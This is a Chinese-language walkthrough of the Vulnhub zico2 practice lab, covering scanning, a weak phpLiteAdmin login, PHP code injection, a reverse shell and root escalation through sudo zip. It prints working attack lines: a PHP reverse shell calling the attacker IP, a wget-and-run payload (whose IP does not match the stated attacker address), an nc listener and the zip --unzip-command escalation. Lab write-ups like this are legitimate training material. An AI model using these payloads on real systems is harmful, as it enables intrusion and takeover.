[【渗透测试】Vulnhub zico2]

渗透环境环境准备

zico2靶场下载地址https://www.vulnhub.com/entry/zico2-1,210/

1
2
3
攻击机:192.168.207.130

靶机:192.168.207.136
1
2
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
目标:获取目标靶机root目录下的flag

进行渗透

一、 获取端口信息

1. 主机扫描
1
arp-scan -l

e1e8640aad5ed430.png

发现靶机的IP地址为 `192.168.207.136,然后用nmap对靶机进行详细地扫描。

2. 端口扫描
1
nmap -A -sV -p- --min-parallelism 100 192.168.207.136
1
2
3
4
5
-A 代表综合性扫描,能收集很多重要的信息

-sV 代表扫描主要的服务信息

-p- 参数p是指定端口,后面的-代表所有端口。

3.目录查找
1
dirsearch -u 192.168.207.136

de226faf79d045b4.png

靶机开放了80端口,111端口和53953端口,查一下发现111可能存在漏洞,但是这个漏洞只能使目标主机崩溃,所以没有过多研究。然后继续扫描目录。

4.网站查找漏洞

在研究这个网站时发现可能又文件包含漏洞

c374dd1a8b4d9018.png

尝试目录穿越

196c11a129aa81f0.png

二. 渗透过程

发现敏感目录dbadmin,访问 http://192.168.207.136/dbadmin/,发现目录遍历,且同时存在 test_db.php文件,发现是类似于MySQL的phpmyadmin,靶机的这个是sqlite的网页版管理,尝试弱口令admin登录成功,发现是一个SQLite数据库管理工具.

2fdb7b00b3c182e8.png

在kali上搜索一下phpLiteAdmin v1.9.3是否存在可以利用的漏洞

命令:

1
searchsploit  phpLiteAdmin

739f0d9f2bb62075.png

发现漏洞

我们使用命令看看如何

1
searchsploit -x php/webapps/24044.txt

bda5ffa72895deff.png

三.漏洞利用

根据利用的方法,我们回到phpLiteAdmin页面中,创建一个数据库

80c6b83e50a10b55.png

然后再继续创建一个表

9d8aa1bd85742b70.png

我们插入phpinfo测试一下

f0ad0154fedcf4b2.png

出现回显

005305fb757ca119.png

之后我们为反弹shell做准备

首先我们先去kali文件系统下的/var/www/html/目录创建shell.txt

文件内容

1
2
<?php $sock=fsockopen("192.168.207.130",2333);exec("/bin/sh -i <&3 >&3 2>&3");?>

db7700e7ac972e58.png

然后继续使用命令

在开启kali的apache服务

service apache2 start

7dc0b3bed4e09de6.png

然后在网站里添加语句

1
<?php system("wget 192.168.49.131/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>

d971bc0fe6f14f80.png

之后我们先监听

1
nc -lvnp 2333

然后我们访问网站

ed2e63c9a881bd4f.png

然后连接成功(网页显示在转动就对了)

9154da83e4039067.png

我们进入home文件夹

使用ls命令查找文件我们找到文件

09928a03ac039250.png

找到了zico我们继续看看

d8e936353a069a57.png

找到用户和密码了

1
2
zico
sWfCsfJSPV9H3AmQzw8

四.提权

既然知道密码了我们就开始

1
su zico

输入密码进入zico账户

ba09b670a4db67c9.png

使用

1
2
sudo -l
id

来看权限

7a25f3496d183798.png

使用zip提权

参考文章如何在类Unix系统上使用ZIP命令进行本地提权 - FreeBuf网络安全行业门户

在/tmp下创建一个空文件 因为tmp目录所以用户均可写可读,且执行权限较高

1
touch /tmp/danm

运行下面这个命令 提权 通过压缩一个存在的文件,并调用 -T 参数输出 shell

1
sudo -u root zip /tmp/danm.zip /tmp/danm -T --unzip-command="sh -c /bin/bash"

d7c044982777f565.png

然后我们找flag去

a24a8b17936e9454.png

成功!!解决!!

这种方法也可以

d6ba5f45cad07225.png